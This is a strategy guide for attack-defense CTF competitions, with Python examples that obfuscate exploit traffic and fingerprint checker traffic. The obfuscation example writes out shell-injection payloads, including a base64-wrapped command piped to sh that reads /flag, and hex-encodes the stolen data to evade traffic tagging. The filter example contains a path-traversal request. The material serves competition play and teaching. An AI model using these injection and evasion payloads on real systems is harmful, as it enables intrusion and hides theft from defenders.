
Attack-Defense Strategy

This section outlines some strategies for playing A/D CTFs, ranked from least to most advanced.

Taking Inventory

Gathering information about each service at the start of the CTF, and using it to assign players and prioritize work, maximizes the expected return from your search for vulnerabilities.

Tools like CTFNote were made specifically to help with this task.

Low Hanging Fruit

Because exploits deployed early collect points for the rest of the CTF, taking a basic overview of each service and identifying low-hanging fruit before the network opens is essential. Moreover, vulnerabilities found this way can be patched before other teams have a chance to exploit them.

Attack vs Defense

Since most scoring formulas favour attack over defense, players should prioritize writing exploits over patching, except in those cases where writing the exploit is disproportionately difficult. By the same logic, teams should prioritize exploits which are easy to write but difficult to patch, since other teams stay vulnerable to them for longest.

Attack Replay & Obfuscation

Most exploits can be stolen by observing network traffic, and reverse engineering an exploit this way is often easier than finding the vulnerability yourself. Some monitoring tools, notably tulip, even automate part of the process with a Copy as Pwntools button that generates a pwntools script mimicking the recorded traffic.

Because of this, it may pay off to obfuscate your exploit traffic, especially when the vulnerability is difficult to find and nobody else has exploited it yet.
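The following is an added example, not code from the original page or from tulip, showing what obfuscation buys you on the wire. It assumes a hypothetical service with a shell injection in a host field and a flag format of 31 uppercase alphanumerics followed by "=" (constructed; real games publish their own regex). Traffic analysers tag a flow as interesting when its bytes match the flag regex, so a plaintext exfiltration is flagged and ready to copy; a hex-encoded flag and a base64-wrapped command dodge that tagging and are not readable at a glance. The service responses are computed locally here to stand in for the vulnerable service.

```python
import base64
import binascii
import re
from typing import List, Tuple

# Constructed flag format; real games publish their own regex.
FLAG_RE = re.compile(rb"[A-Z0-9]{31}=")

# Constructed sample flag (31 characters of [A-Z0-9] plus "=").
SAMPLE_FLAG = b"FAUST" + b"A" * 26 + b"="

Flow = Tuple[bytes, bytes]  # (client -> server bytes, server -> client bytes)


def tag_flag_flows(flows: List[Flow]) -> List[int]:
    """Defender-side view: indices of flows whose bytes match the flag regex.
    Traffic analysers tag flows like this, which is what makes a plaintext
    exfiltration easy to spot and replay."""
    return [i for i, (req, resp) in enumerate(flows) if FLAG_RE.search(req + resp)]


def naive_exploit_flow(flag: bytes) -> Flow:
    """Hypothetical vulnerability: the service pastes the host field into a shell
    command. Injected command and plaintext flag are both readable on the wire."""
    request = b"PING host=127.0.0.1; cat /flag\n"
    response = b"PONG\n" + flag + b"\n"  # stand-in for the vulnerable service's output
    return request, response


def obfuscated_exploit_flow(flag: bytes) -> Flow:
    """Same vulnerability, but the injected command is base64-wrapped so the payload
    is not obvious, and the flag is hex-encoded before it leaves the box so the
    flow never matches FLAG_RE."""
    inner = b"cat /flag | od -An -tx1 | tr -d ' \\n'"
    wrapped = b"echo " + base64.b64encode(inner) + b" | base64 -d | sh"
    request = b"PING host=127.0.0.1; " + wrapped + b"\n"
    response = b"PONG\n" + binascii.hexlify(flag) + b"\n"  # stand-in for the service's output
    return request, response


def recover_flag(response: bytes) -> bytes:
    """Attacker side: undo the hex encoding and verify the result is a flag."""
    blob = response.split(b"\n")[1]
    flag = binascii.unhexlify(blob)
    if not FLAG_RE.fullmatch(flag):
        raise ValueError("decoded data is not a flag")
    return flag


if __name__ == "__main__":
    flows = [naive_exploit_flow(SAMPLE_FLAG), obfuscated_exploit_flow(SAMPLE_FLAG)]
    print("flows tagged by flag regex:", tag_flag_flows(flows))
    print("recovered:", recover_flag(flows[1][1]))
```

Hex encoding alone only defeats automated tagging; a human reading the flow still decodes it in seconds. If the injected command has access to a real cipher (e.g. openssl on the target), keying the output raises the bar further. Note that obfuscation does not stop a plain byte-for-byte replay of a stateless request against other teams, so it matters most for vulnerabilities that nobody else has found yet.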

Checker Fingerprinting

Capturing game traffic directly after network open can help differentiate checker traffic from exploit traffic later in the game: as long as the service is not exploited immediately, early-game traffic is unlikely to originate from other players, so the capture serves as a reference sample of what the checker looks like.

If the checker behaves in a way that players can detect but not replicate themselves (e.g. it uses a specific private key for a crypto service), teams can build so-called Superman-Defenses, which prevent any non-checker traffic from reaching the service.
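The following is an added example, not code from the original page, of building a checker fingerprint from an early-game capture and using it as a filter in front of a service. It assumes a hypothetical HTTP note service; the captured request heads and later sessions are constructed. The features used are the ones a checker written once and never changed keeps constant: its User-Agent and the order in which its HTTP client emits headers.

```python
from typing import List, Set, Tuple

# Constructed capture: (source IP, request head) of the first request in each session,
# recorded right after network open when nearly all traffic is the checker's.
EARLY_CAPTURE: List[Tuple[str, bytes]] = [
    ("10.0.0.2", b"PUT /note HTTP/1.1\r\nHost: 10.0.13.1\r\nUser-Agent: python-requests/2.31.0\r\n"
                 b"Accept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n"
                 b"Content-Length: 41\r\n\r\n"),
    ("10.0.0.2", b"GET /note/7f3a HTTP/1.1\r\nHost: 10.0.13.1\r\nUser-Agent: python-requests/2.31.0\r\n"
                 b"Accept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"),
    ("10.0.0.3", b"PUT /note HTTP/1.1\r\nHost: 10.0.13.1\r\nUser-Agent: python-requests/2.31.0\r\n"
                 b"Accept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n"
                 b"Content-Length: 39\r\n\r\n"),
]

# Constructed later-game sessions: the checker, an attacker using curl, and an attacker
# who copied the checker's User-Agent but not its header order.
LATER_SESSIONS: List[bytes] = [
    b"GET /note/c0de HTTP/1.1\r\nHost: 10.0.13.1\r\nUser-Agent: python-requests/2.31.0\r\n"
    b"Accept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n",
    b"GET /note/../../flag HTTP/1.1\r\nHost: 10.0.13.1\r\nUser-Agent: curl/8.4.0\r\nAccept: */*\r\n\r\n",
    b"GET /note/c0de HTTP/1.1\r\nHost: 10.0.13.1\r\nAccept: */*\r\nUser-Agent: python-requests/2.31.0\r\n\r\n",
]

# Headers whose presence depends on the request rather than the client; ignored when
# comparing header order so PUT and GET from the same client share one fingerprint.
VOLATILE_HEADERS = {"content-length", "content-type"}

Features = Tuple[str, Tuple[str, ...]]


def parse_head(raw: bytes) -> Tuple[str, str, List[Tuple[str, str]]]:
    """Split a request head into method, path and an ordered header list."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, path, headers


def client_features(raw: bytes) -> Features:
    """User-Agent plus header order, minus headers that vary per request."""
    _, _, headers = parse_head(raw)
    agent = dict(headers).get("user-agent", "")
    order = tuple(name for name, _ in headers if name not in VOLATILE_HEADERS)
    return agent, order


def build_fingerprint(capture: List[Tuple[str, bytes]]) -> Set[Features]:
    """Allow-list of feature tuples observed in the early-game capture."""
    return {client_features(raw) for _, raw in capture}


def is_checker_like(raw: bytes, fingerprint: Set[Features]) -> bool:
    return client_features(raw) in fingerprint


def superman_filter(sessions: List[bytes], fingerprint: Set[Features]) -> Tuple[List[int], List[int]]:
    """Return (forwarded, dropped) session indices; only checker-like sessions pass."""
    forwarded = [i for i, raw in enumerate(sessions) if is_checker_like(raw, fingerprint)]
    dropped = [i for i in range(len(sessions)) if i not in forwarded]
    return forwarded, dropped


if __name__ == "__main__":
    fp = build_fingerprint(EARLY_CAPTURE)
    print("fingerprint:", fp)
    print("forwarded, dropped:", superman_filter(LATER_SESSIONS, fp))
```

Two caveats before putting a filter like this in front of a scored service. A fingerprint built from observable features can be copied by any attacker who studies the checker, so it only buys time; the private-key case from the text is stronger precisely because the feature cannot be replicated. And a filter that is too tight drops the checker itself and costs SLA points, so run every rule against the early capture (all early sessions must pass) before enabling it.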